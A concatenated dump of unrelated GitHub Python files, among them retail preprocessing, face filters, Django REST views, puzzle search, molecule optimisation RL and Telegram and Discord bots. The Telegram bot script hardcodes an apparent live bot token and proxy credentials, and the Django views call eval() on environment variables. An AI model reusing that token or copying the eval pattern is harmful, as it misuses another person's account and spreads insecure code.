Initialization\nimport numpy as np\nimport torch\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom itertools import chain\nfrom datetime import datetime as dt\nimport random\n\npd.set_option('display.max_columns', None)\n\n\ndef split_temporal(df, time, train_split=0.8, val_split=None):\n df[time] = pd.to_datetime(df[time])\n df = df.sort_values(time)\n\n train_ind = int(np.round(len(df)*train_split))\n train_df = df.iloc[:train_ind]\n\n if val_split == None:\n test_df = df.iloc[train_ind:]\n return train_df, test_df\n else:\n val_ind = int(np.round(len(df)*(val_split + train_split)))\n val_df = df.iloc[train_ind:val_ind]\n test_df = df.iloc[val_ind:]\n \n return train_df, val_df, test_df\n\n\ndef preprocessing(df, column):\n print(df[column].describe())\n remap = {df[column].unique()[i]: i for i in range(len(df[column].unique()))}\n df[f\"{column}\"] = df[column].replace(remap)\n print(df[f\"{column}\"].describe())\n print(df.head())\n return df\n\nif __name__ == \"__main__\":\n df = pd.read_csv(\"online_retail_processed.csv\")\n df = preprocessing(df, \"CustomerID\")\n df.to_csv(\"online_retail_processed.csv\", index=False)\n ","repo_name":"JuliaLWang8/RetailRecommender","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33658894814","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\n# from filters_image.change_filter_image import change_filter\nimport os\n\ndef image_filtering_face(path_filter,path_img,center,width,height,up,left,counte=0):\n\n\n filter_image = []\n for i in path_filter:\n filter_image.append(cv2.imread(i))\n\n image = cv2.imread(path_img)\n rows, cols, _ = image.shape\n filter1 = np.zeros((rows, cols), np.uint8)\n filter1.fill(0)\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n detector = dlib.get_frontal_face_detector()\n faces = detector(image)\n if faces:\n # try:\n for i in range(len(path_filter)):\n test = filter(image,gray_image,faces,filter_image[i],center[i],width[i],height[i],up[i],left[i])\n return test\n # except:\n # image = cv2.imread(path_img)\n\n # return image\n\n\ndef filter(image,gray_frame,faces,filter_image1,center,width,height,up=0,left=0):\n predictor_path = \"../assest/shape_predictor_68_face_landmarks.dat\"\n predictor = dlib.shape_predictor(predictor_path)\n for face in faces:\n try:\n landmarks = predictor(gray_frame, face)\n\n center_filter = (landmarks.part(center).x-left, landmarks.part(center).y-up)\n left_filter = (landmarks.part(4).x, landmarks.part(4).y)\n right_filter = (landmarks.part(14).x, landmarks.part(14).y)\n\n filter_width = int(hypot(left_filter[0] - right_filter[0],\n left_filter[1] - right_filter[1]) * width)\n filter_height = int(filter_width * height)\n\n # New filter position\n top_left = (int(center_filter[0] - filter_width / 2),\n int(center_filter[1] - filter_height / 2))\n bottom_right = (int(center_filter[0] + filter_width / 2),\n int(center_filter[1] + filter_height / 2))\n\n # Adding the new filter\n filtery = cv2.resize(filter_image1, (filter_width, filter_height))\n filtery_gray = cv2.cvtColor(filtery, cv2.COLOR_BGR2GRAY)\n _, filter1 = cv2.threshold(filtery_gray, 25, 255, cv2.THRESH_BINARY_INV)\n\n filter_area = image[top_left[1]: top_left[1] + filter_height,\n top_left[0]: top_left[0] + filter_width]\n filter_area_no_filter = cv2.bitwise_and(filter_area, filter_area, mask=filter1)\n final_filter = cv2.add(filter_area_no_filter, filtery)\n\n image[top_left[1]: top_left[1] + filter_height,\n top_left[0]: top_left[0] + filter_width,:] = final_filter\n print(\"filter1\")\n except:\n print(\"except\")\n return image\n # cv2.imshow(\"Frame\", image)\n # key = cv2.waitKey(0)\n\n","repo_name":"Python-Hiss/Filteristic","sub_path":"filters_image/image_filtering_face.py","file_name":"image_filtering_face.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74228822506","text":"#!/usr/bin/env python3\r\nimport requests\r\nproxies = {'https': 'socks5://telegram:telegram@jcidw.tgproxy.me:1080'}\r\nTOKEN = \"692219844:AAGM5dcY5UJL58tDUL_zgohn0Pg4NqbCyFE\"\r\nMAIN_URL = \"https://api.telegram.org/bot692219844:AAGM5dcY5UJL58tDUL_zgohn0Pg4NqbCyFE/sendMessage\"\r\n\r\npayload = {\r\n 'chat_id': 373853051,\r\n 'text': ' И тебе привет, КАЗЕЛ!',\r\n 'reply_to_message_id': 4\r\n}\r\n\r\nr = requests.post(MAIN_URL, proxies=proxies, data=payload)\r\n#r = requests.get(MAIN_URL, proxies=proxies)\r\n\r\nprint(r.json())\r\n#https://t.me/socks?server=jcidw.tgproxy.me&port=1080&user=telegram&pass=telegram","repo_name":"Andro1997/bot_python","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24724729692","text":"import streamlit as st\nfrom multiapp import MultiApp\n# import your app modules here\nfrom pages import analysis, dynamic_view1, dynamic_view2, sentiment_model, topic_model\n\nst.set_page_config(page_title=\"Twitter Analysis Visualization\", layout=\"wide\")\n\napp = MultiApp()\n\n\nst.sidebar.markdown(\"\"\"\n# Multi-Page App\nThis multi-page app is using the [streamlit-multiapps](https://github.com/upraneelnihar/streamlit-multiapps) framework developed by [Praneel Nihar](https://medium.com/@u.praneel.nihar). Also check out his [Medium article](https://medium.com/@u.praneel.nihar/building-multi-page-web-app-using-streamlit-7a40d55fa5b4).\n# Modifications\n\\t- Page Folder Based Access\n\\t- Presentation changed to SideBar\n\"\"\")\n\n# Add all your application here\napp.add_app(\"Analysis\", analysis.app)\napp.add_app(\"Dynamic Analysis 1\", dynamic_view1.app)\napp.add_app(\"Dynamic Analysis 2\", dynamic_view2.app)\napp.add_app(\"Sentiment Model\", sentiment_model.app)\napp.add_app(\"Topic Model\", topic_model.app)\n# The main app\napp.run()\n","repo_name":"Amdework21/Twitter-Data-Analysis21","sub_path":"visualization/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18859830291","text":"import glob\n\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot\n\nfrom performance400 import intrinsic_pre_autocalibration, extrinsic_pre_calibration, extrinsic_calibration, \\\n trajectory_utils, speed_utils\n\nEXTRACT_MIRE = False\nINTRINSIC_CALIBRATION = False\nPRE_EXTRINSIC_CALIBRATION = False\n\nREFRESH_RATE = 59.94\n\n# Used to extract frames from a video of targets\nif EXTRACT_MIRE:\n left_mire = cv.VideoCapture(\"videos/targets/left.mkv\")\n right_mire = cv.VideoCapture(\"videos/targets/right.mkv\")\n intrinsic_pre_autocalibration.extract_targets(left_mire, 50, False)\n intrinsic_pre_autocalibration.extract_targets(right_mire, 50, True)\n\nleft_video = cv.VideoCapture(\"videos/runway/left_run.mkv\")\nright_video = cv.VideoCapture(\"videos/runway/right_run.mkv\")\nleft_check, left_background = left_video.read()\nright_check, right_background = right_video.read()\n\n# Used to get the intrinsic parameters of a camera\n# To use only once for a camera with no autofocus\nif INTRINSIC_CALIBRATION:\n left_targets = glob.glob(\"images/targets/left/*.jpg\")\n right_targets = glob.glob(\"images/targets/right/*.jpg\")\n intrinsic_pre_autocalibration.autocalibrate(left_targets, right_targets, 10, 7)\n\n# Used to get the points of interest of a viewpoint\n# To use only once per viewpoint calibration\nif PRE_EXTRINSIC_CALIBRATION:\n left_object_points = np.loadtxt(\"matrices/interest_points/object_points/left\")\n right_object_points = np.loadtxt(\"matrices/interest_points/object_points/right\")\n extrinsic_pre_calibration.calibrate(left_background, right_background)\n\nif (not EXTRACT_MIRE) and (not INTRINSIC_CALIBRATION):\n # We get the intrinsic parameters from the cameras and calculate their extrinsic parameters\n # This last step is used because the cameras may have moved slightly comparing to the last utilisation\n left_interest_points, right_interest_points = extrinsic_pre_calibration.get_interest_points()\n intrinsic_parameters = intrinsic_pre_autocalibration.get_intrinsic_parameters()\n extrinsic_calibration.calibrate(left_background, right_background, left_interest_points, right_interest_points,\n intrinsic_parameters)\n left_extrinsic_parameters = extrinsic_calibration.get_extrinsic_parameters(False)\n right_extrinsic_parameters = extrinsic_calibration.get_extrinsic_parameters(True)\n\n # We extract the trajectory using the two cameras\n trajectory = trajectory_utils.get_trajectory(left_video, right_video, left_lower_bound=(0, 450),\n left_upper_bound=(1680, 1080), right_lower_bound=(153, 355),\n right_upper_bound=(1920, 1080))\n\n # We draw it on the backgrounds along with the axes from the calibration\n trajectory_utils.draw_trajectory(left_background, trajectory.copy(), left_extrinsic_parameters)\n trajectory_utils.draw_trajectory(right_background, trajectory.copy(), right_extrinsic_parameters)\n extrinsic_calibration.draw_axes(left_background, False)\n extrinsic_calibration.draw_axes(right_background, True)\n\n # We display those backgrounds\n cv.namedWindow(\"Trajectoire de gauche\", cv.WINDOW_NORMAL)\n cv.namedWindow(\"Trajectoire de droite\", cv.WINDOW_NORMAL)\n cv.imshow(\"Trajectoire de gauche\", left_background)\n cv.imshow(\"Trajectoire de droite\", right_background)\n\n cv.waitKey(0)\n cv.destroyAllWindows()\n left_video.release()\n right_video.release()\n\n # Finally we output sped profiles\n speed_profile, index_speed = speed_utils.get_speed_raw_profile(trajectory, REFRESH_RATE)\n speed_utils.export_speed_profiles(trajectory, REFRESH_RATE)\n pyplot.title(\"Profil de vitesse\")\n pyplot.xlabel(\"Distance (m)\")\n pyplot.ylabel(\"Vitesse (m/s)\")\n pyplot.plot(index_speed, speed_profile)\n pyplot.show()\n","repo_name":"thomas-schillaci/performance400","sub_path":"performance400/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"34296763762","text":"import os\nimport dotenv\nfrom django.db import DataError\nfrom pymongo import MongoClient\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom turtle_inc import settings\nfrom .models import *\nfrom .persistence import PostgresPersistence, MongoPersistence\n\n\npersistence = PostgresPersistence() if not eval(os.environ.get(\"USE_NOSQL\")) else MongoPersistence()\n\n\nclass Clients(APIView):\n def get(self, request):\n return Response(persistence.get_clients(), status=status.HTTP_200_OK)\n\n def post(self, request):\n data = request.data\n if data.get(\"nombre\") is None or \\\n data.get(\"apellido\") is None or \\\n data.get(\"direccion\") is None or \\\n data.get(\"activo\") is None:\n return Response({}, status=status.HTTP_400_BAD_REQUEST)\n try:\n return Response(persistence.new_client(data.get(\"nombre\"), data.get(\"apellido\"), data.get(\"direccion\"), data.get(\"activo\")), status=status.HTTP_201_CREATED)\n except DataError as e:\n return Response({\"error\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ClientInformation(APIView):\n def get(self, request, id):\n try:\n return Response(persistence.get_client(id), status=status.HTTP_200_OK)\n except Cliente.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, id):\n try:\n data = request.data\n if len(data) == 0:\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n return Response(persistence.update_client(id, data.get(\"nombre\"), data.get(\"apellido\"), data.get(\"direccion\"), data.get(\"activo\")), status=status.HTTP_200_OK)\n except Cliente.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n except DataError as e:\n return Response({\"error\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, id):\n try:\n return Response(persistence.delete_client(id), status=status.HTTP_200_OK)\n except Cliente.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass Products(APIView):\n def get(self, request):\n return Response(persistence.get_products(), status=status.HTTP_200_OK)\n\n def post(self, request):\n data = request.data\n if data.get(\"marca\") is None or \\\n data.get(\"nombre\") is None or \\\n data.get(\"descripcion\") is None or \\\n data.get(\"precio\") is None or \\\n data.get(\"stock\") is None:\n return Response({}, status=status.HTTP_400_BAD_REQUEST)\n try:\n return Response(persistence.new_product(data.get(\"marca\"), data.get(\"nombre\"), data.get(\"descripcion\"), data.get(\"precio\"), data.get(\"stock\")), status=status.HTTP_201_CREATED)\n except DataError as e:\n return Response({\"error\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProductInformation(APIView):\n def get(self, request, id):\n try:\n return Response(persistence.get_product(id), status=status.HTTP_200_OK)\n except Producto.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, id):\n try:\n data = request.data\n if len(data) == 0:\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n return Response(persistence.update_product(id, data.get(\"marca\"), data.get(\"nombre\"), data.get(\"descripcion\"), data.get(\"precio\"), data.get(\"stock\")), status=status.HTTP_200_OK)\n except Producto.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n except DataError as e:\n return Response({\"error\": str(e)}, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, id):\n try:\n return Response(persistence.delete_product(id), status=status.HTTP_200_OK)\n except Producto.DoesNotExist:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass MigrationAssistant(APIView):\n def post(self, request):\n print(eval(os.environ.get(\"USE_NOSQL\")))\n if eval(os.environ.get(\"USE_NOSQL\")):\n return Response({\"error\": \"Already migrated to NoSQL\"}, status=status.HTTP_400_BAD_REQUEST)\n\n mongo_client = MongoClient(os.environ.get(\"MONGO_HOST\"), int(os.environ.get(\"MONGO_PORT\")))\n mongo_client.drop_database(os.environ.get(\"MONGO_DATABASE\"))\n db = mongo_client[os.environ.get(\"MONGO_DATABASE\")]\n clients = db[\"E01_CLIENTE\"]\n products = db[\"E01_PRODUCTO\"]\n invoices = db[\"E01_FACTURA\"]\n\n product_objects = []\n for product in Producto.objects.all():\n product_objects.append({\n \"codigo_producto\": product.codigo_producto,\n \"marca\": product.marca,\n \"nombre\": product.nombre,\n \"descripcion\": product.descripcion,\n \"precio\": product.precio,\n \"stock\": product.stock\n })\n products.insert_many(product_objects)\n\n for client in Cliente.objects.all():\n telephones = []\n for telephone in client.telefono_set.all():\n telephones.append({\n \"codigo_area\": telephone.codigo_area,\n \"nro_telefono\": telephone.nro_telefono,\n \"tipo\": telephone.tipo\n })\n clients.insert_one({\n \"nro_cliente\": client.nro_cliente,\n \"nombre\": client.nombre,\n \"apellido\": client.apellido,\n \"direccion\": client.direccion,\n \"activo\": client.activo,\n \"telefonos\": telephones\n })\n\n for invoice in Factura.objects.all():\n details = []\n for detail in invoice.detallefactura_set.all():\n details.append({\n \"id_producto\": products.find_one({\"codigo_producto\": detail.codigo_producto.codigo_producto})[\"_id\"],\n \"nro_item\": detail.nro_item,\n \"cantidad\": detail.cantidad\n })\n invoices.insert_one({\n \"fecha\": invoice.fecha.isoformat(),\n \"total_sin_iva\": invoice.total_sin_iva,\n \"total_con_iva\": invoice.total_con_iva,\n \"iva\": invoice.iva,\n \"id_cliente\": clients.find_one({\"nro_cliente\": invoice.nro_cliente.nro_cliente})[\"_id\"],\n \"detalle_factura\": details\n })\n\n global persistence\n persistence = MongoPersistence()\n os.environ[\"USE_NOSQL\"] = \"True\"\n dotenv.set_key(os.path.join(settings.BASE_DIR, \".env\"), \"USE_NOSQL\", os.environ[\"USE_NOSQL\"])\n\n return Response({}, status=status.HTTP_200_OK)\n","repo_name":"alejofl/tpo-bd2","sub_path":"turtle_inc/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4538480206","text":"import csv\r\nimport eightpuzzle as ep\r\nimport search\r\n\r\n# Define the search strategies\r\nstrategies = [search.dfs, search.bfs, search.aStarSearch]\r\n ##,search.uniformCostSearch, search.astar ]\r\n\r\n# Define the best heuristic from Task 2\r\nbest_heuristic = ep.h1 # Replace with your best heuristic\r\n\r\n# Open the scenarios file and read all scenarios\r\nwith open('scenarios.csv', 'r') as scenarios_file:\r\n scenarios = list(csv.reader(scenarios_file))\r\n\r\n# Open the results file\r\nwith open('BestSearchResults.csv', 'w', newline='') as results_file:\r\n results_writer = csv.writer(results_file)\r\n\r\n # Write the header row\r\n results_writer.writerow(['Scenario', 'Strategy', 'Depth', 'Expanded nodes', 'Fringe size'])\r\n\r\n # For each scenario\r\n for scenario in scenarios:\r\n if scenario: # Skip empty lines\r\n # Parse the scenario to get the initial state\r\n initial_state = list(map(int, scenario))\r\n print(f\"\\nScenario: {initial_state}\")\r\n\r\n # Create an 8-puzzle problem instance\r\n puzzle = ep.EightPuzzleState(initial_state)\r\n problem = ep.EightPuzzleSearchProblem(puzzle)\r\n\r\n # For each strategy\r\n for strategy in strategies:\r\n print(f\"Applying {strategy.__name__}...\")\r\n if strategy == search.astar:\r\n # Use the best heuristic for A* search\r\n actions = strategy(problem, heuristic=best_heuristic)\r\n else:\r\n # Use the strategy without a heuristic\r\n actions = strategy(problem)\r\n\r\n # Record the results (depth, expanded nodes, fringe size)\r\n depth = len(actions)\r\n expanded_nodes = problem.expandedNodes\r\n fringe_size = problem.fringeSize\r\n\r\n print(f\"Depth: {depth}, Expanded nodes: {expanded_nodes}, Fringe size: {fringe_size}\")\r\n\r\n # Write the results to the CSV file\r\n results_writer.writerow([initial_state, strategy.__name__, depth, expanded_nodes, fringe_size])\r\n","repo_name":"MohamedMiladi777/eight_puzzle_project","sub_path":"besy_search_method.py","file_name":"besy_search_method.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73799496427","text":"import argparse\nimport os\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom rdkit import Chem\n\nfrom main_mol_opt import triple_run\nfrom src.rl.applications.mol import hyp\nfrom src.rl.applications.mol.agent_mol_opt import RewardMolecule\nfrom src.rl.applications.mol.model.dqn import MolDQN\nfrom src.rl.applications.mol.model.model_definitions import triple_predict\n\nwarnings.filterwarnings(\"ignore\")\n# python3 run_mol_opt.py -f 0 -p 320 -freq 500 -m \"random\"\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--file', type=int, required=True)\nparser.add_argument('-p', '--points', nargs='?', const=800, type=int, default=800)\nparser.add_argument('-freq', '--frequency', nargs='?', const=500, type=int, default=500)\nparser.add_argument('-m', '--mode', nargs='?', const='random', type=str, default=\"random\")\nargs = parser.parse_args()\n\nmodel1 = MolDQN(hyp.fingerprint_length, 2)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel1.load_state_dict(torch.load('src/rl/applications/mol/model/mol_opt/homo_lumo_model1.pth', map_location=device))\nmodel1.to(device)\nmodel1.eval()\n\nmodel2 = MolDQN(hyp.fingerprint_length, 2)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel2.load_state_dict(torch.load('src/rl/applications/mol/model/mol_opt/homo_lumo_model2.pth', map_location=device))\nmodel2.to(device)\nmodel2.eval()\n\nmodel3 = MolDQN(hyp.fingerprint_length, 2)\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel3.load_state_dict(torch.load('src/rl/applications/mol/model/mol_opt/homo_lumo_model3.pth', map_location=device))\nmodel3.to(device)\nmodel3.eval()\n\n\ndef approx_reward(smiles, ref_homo, ref_lumo, model1_, model2_, model3_):\n molecule = Chem.MolFromSmiles(smiles)\n predictions = triple_predict(molecule, model1_, model2_, model3_)\n homo, lumo = np.mean(predictions, axis=0)\n diff = lumo - homo\n diff_ref = ref_lumo - ref_homo\n # logp = penalized_logp(molecule)\n # logp_ref = hyp.logp_ref\n penalty = np.abs(diff - diff_ref) * 27.2114 + (lumo - ref_lumo) * 27.2114\n # penalty += 0.1*(logp - logp_ref) ** 2\n return -penalty\n\n\nclass property(RewardMolecule):\n model1 = None\n model2 = None\n model3 = None\n ref_homo = None\n ref_lumo = None\n\n def _reward(self):\n return approx_reward(self._state, self.ref_homo, self.ref_lumo, self.model1, self.model2, self.model3)\n\n\nTB_LOG_PATH = \"outputs/mol/mol_opt/retrain\"\nif not os.path.exists(TB_LOG_PATH):\n os.makedirs(TB_LOG_PATH, exist_ok=True)\n\nchk_dir = TB_LOG_PATH + \"/checkpoints_\" + str(args.file)\nif not os.path.exists(chk_dir):\n os.makedirs(chk_dir, exist_ok=True)\n\n# checkpoint = chk_dir + \"/checkpoint_2500/\"\nepisodes_list, original_smiles_list, SMILES_list, rewards_list = triple_run(property, chk_dir=chk_dir,\n start_from_chk=None,\n model1=model1, model2=model2,\n model3=model3,\n approx_reward=approx_reward,\n model_update=True,\n update_mode=args.mode,\n n_points=int(args.points),\n frequency=args.frequency,\n column=\"HOMO_LUMO\")\n\ndf = pd.DataFrame()\ndf[\"episode\"] = episodes_list\ndf[\"SMILES0\"] = original_smiles_list\ndf[\"SMILES\"] = SMILES_list\ndf[\"reward\"] = rewards_list\ndf.to_csv(TB_LOG_PATH + \"/\" + str(args.file) + \".csv\", index=False, header=True)\n","repo_name":"32af3611/acrl","sub_path":"apps/mol/run_mol_opt.py","file_name":"run_mol_opt.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"36469503722","text":"# Counting Sort\n\na = [9, 8, 7, 6, 5, 4, 3, 2, 1]\nprint(a)\n\ncount = [0] * (max(a)+1)\nfor k in a:\n count[k] += 1\n \nfor i in range(len(count)-1):\n count[i+1] += count[i]\n \nb = [0] * len(a)\nfor k in reversed(a):\n count[k] -= 1\n b[count[k]] = k\nprint(b)","repo_name":"WenjieZ/sorting","sub_path":"counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30280047758","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom math import log,ceil,floor\nfrom matplotlib import pyplot as plt\nimport matplotlib.font_manager as mfm\nfrom matplotlib.font_manager import FontProperties\n\nimport sys\nsys.path.append(r\"results_py\")\nfrom sketch_fringe import data as results_fringe\nfrom sketch_hier import data as results_hier\n\ndef crlite(p,f=log(2.)):\n # TODO: integrality\n if p<=0: return 0\n return p * (log(1/p,2.)/f + 4.2*log(2.)/f)\n\ndef ent(p):\n if p<=0 or p>=1: return 0\n return (p*log(p) + (1-p)*log(1-p)) / log(0.5)\n\ndef lp_inspired_opt(prs,verbose=False):\n EPSILON = 0.01\n prs = list(sorted(prs))\n \n def pot(x): return 2**floor(log(x*1.,2.))\n def pod(x): return 2**(ceil(log(x*1.,2.)-EPSILON)-1)\n def bits_to_express(p):\n c = floor(log(p,0.5))\n p *= 2**c\n return c + (2-2*p)\n \n qs = [pot(pr) for pr in prs]\n qs[-1] = 1-sum(qs[:-1])\n def deriv(i): return prs[i]/pot(qs[i]) - prs[-1]/pod(qs[-1])\n for _ in range(100): # to prevent it from going off the rails\n dm,i = max((deriv(i),i) for i in range(len(qs)-1))\n #print(qs,dm,i)\n if dm <= 0: break\n amt = min(2*pot(qs[i])-qs[i], qs[-1]-pod(qs[-1]))\n qs[i] += amt\n assert(qs[i] <= 1)\n qs[-1] -= amt\n \n return sum(p*bits_to_express(q) for p,q in zip(prs,qs))\ndef new_est(p): return lp_inspired_opt([p,1-p])\n\nxcoords = [x/100000. for x in range(1,50001)]\n\nprop = mfm.FontProperties(family=\"Arial\", size=12, weight=\"normal\")\n\nfig,ax = plt.subplots(figsize=(6,4.5))\nax.set_xlim(1e-5,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"bits per revocation\")\nax.set_xscale(\"log\")\n#ax.set_yscale(\"log\")\nax.plot(xcoords, [crlite(x)/x for x in xcoords], label=\"CRLite (est.)\")\n#ax.plot(xcoords, [crlite(x,1) for x in xcoords], label=\"CRLite/matrix (est.)\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [b*8/1.e7/p for (p,t,b,q) in results_fringe], label=\"Ours (measured, 10M certs)\")\nax.plot(xcoords, [new_est(x)/x for x in xcoords], label=\"Ours (asymptotic)\")\nax.plot(xcoords, [ent(x)/x for x in xcoords], label=\"Entropy limit\")\nax.legend(loc=\"upper right\", prop=prop)\nfig.savefig(\"entropy.png\", dpi=600)\n\n\nfig,ax = plt.subplots(figsize=(6,4.5))\nax.set_xlim(1e-4,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"size / entropy\")\nax.set_xscale(\"log\")\n# ax.set_ylim(0,3)\n#ax.set_yscale(\"log\")\n#ax.plot(xcoords, [crlite(x)/ent(x) for x in xcoords], label=\"CRLite (est.)\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [b*8/1.e7/ent(p) for (p,t,b,q) in results_fringe], label=\"Ours (measured, 10M certs)\")\nax.plot(xcoords, [new_est(x)/ent(x) for x in xcoords], label=\"Ours (asymptotic)\")\n# ax.plot(xcoords, [1 for x in xcoords], label=\"Shannon\")\nax.legend(loc=\"upper left\", prop=prop)\nfig.savefig(\"ratio.png\", dpi=600)\n\nprint(\"Max ratio:\", max(b*8/1.e7/ent(p) for (p,t,b,q) in results_fringe))\nprint(\"Max ratio above 1e-4:\", max(b*8/1.e7/ent(p) for (p,t,b,q) in results_fringe if p > 1e-4))\n\nfig,ax = plt.subplots(figsize=(6,4.5))\nax.set_xlim(1e-4,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"bits per revocation\")\nax.set_xscale(\"log\")\n#ax.set_yscale(\"log\")\nax.plot(xcoords, [crlite(x)/x for x in xcoords], label=\"CRLite (est.)\")\n#ax.plot(xcoords, [crlite(x,1) for x in xcoords], label=\"CRLite/matrix (est.)\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [b*8/1.e7/p for (p,t,b,q) in results_fringe], label=\"Ours (measured, 10M certs)\")\nax.plot(xcoords, [new_est(x)/x for x in xcoords], label=\"Ours (asymptotic)\")\nax.plot(xcoords, [ent(x)/x for x in xcoords], label=\"Entropy limit\")\nax.legend(loc=\"upper right\", prop=prop)\nfig.savefig(\"entropy.png\", dpi=600)\n\nfig,ax = plt.subplots(figsize=(6,4.5))\n# ax.set_xlim(10e-5,0.5)\nax.set_xlabel(\"fraction revoked\")\nax.set_ylabel(u\"µs / key\")\n# ax.set_xscale(\"log\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_hier], [t/10 for (p,t,b,q) in results_hier], label=\"create hier\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [t/10 for (p,t,b,q) in results_fringe], label=\"create fringe\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_hier], [q/10 for (p,t,b,q) in results_hier], label=\"query hier\")\nax.plot([min(p,1-p) for (p,t,b,q) in results_fringe], [q/10 for (p,t,b,q) in results_fringe], label=\"query fringe\")\nax.legend(loc=\"upper left\", prop=prop)\nfig.savefig(\"sketch-speed.png\", dpi=600)\n","repo_name":"bitwiseshiftleft/compressed_map","sub_path":"attic_c/mkfigure/gensketchplots.py","file_name":"gensketchplots.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"19174926135","text":"import pypulseq as pp\n\n# Inside 3T scanner (UHP):\nsystem = pp.Opts(max_grad=100, grad_unit='mT/m',\n max_slew=200, slew_unit='T/m/s',\n grad_raster_time=4e-6)\n\n# Outside 3T scanner (MR750):\nsystem = pp.Opts(max_grad=50, grad_unit='mT/m',\n max_slew=200, slew_unit='T/m/s',\n grad_raster_time=4e-6)\n\n# Gradient raster time = 4 us","repo_name":"rextlfung/PyPulseq-experiment","sub_path":"lab_scanner_specs.py","file_name":"lab_scanner_specs.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38447137929","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nmap = Basemap(llcrnrlon=-0.5,llcrnrlat=39.8,urcrnrlon=4.,urcrnrlat=43.,\n resolution='i', projection='tmerc', lat_0 = 39.5, lon_0 = 1)\n\nmap.drawmapboundary(fill_color='aqua')\nmap.fillcontinents(color='#ddaa66',lake_color='aqua')\nmap.drawcoastlines()\n\nmap.readshapefile('../sample_files/comarques', 'comarques')\n\nplt.show()","repo_name":"rveciana/BasemapTutorial","sub_path":"code_examples/shapefile/readshapefile_polygon.py","file_name":"readshapefile_polygon.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"9434721277","text":"from discord.ext import commands\nimport discord\nimport logging\nimport config\nfrom cogs import secret\n\ndef setup_logger():\n logging.basicConfig(filename='bot.log', level=logging.INFO)\n\n\n\nclass Bot(commands.Bot):\n def __init__(self, **kwargs):\n super().__init__(command_prefix=commands.when_mentioned_or('!'), **kwargs)\n for cog in config.cogs:\n try:\n self.load_extension(cog)\n except Exception as exc:\n logging.error('Could not load extension {0} due to {1.__class__.__name__}: {1}'.format(cog, exc))\n\n async def on_ready(self):\n logging.info('Logged on as {0} (ID: {0.id})'.format(self.user))\n print('Logged on as {0} (ID: {0.id})'.format(self.user))\n\n\nif __name__ == \"__main__\":\n setup_logger()\n bot = Bot()\n bot.run(secret.token)\n","repo_name":"coyote963/coybot2","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 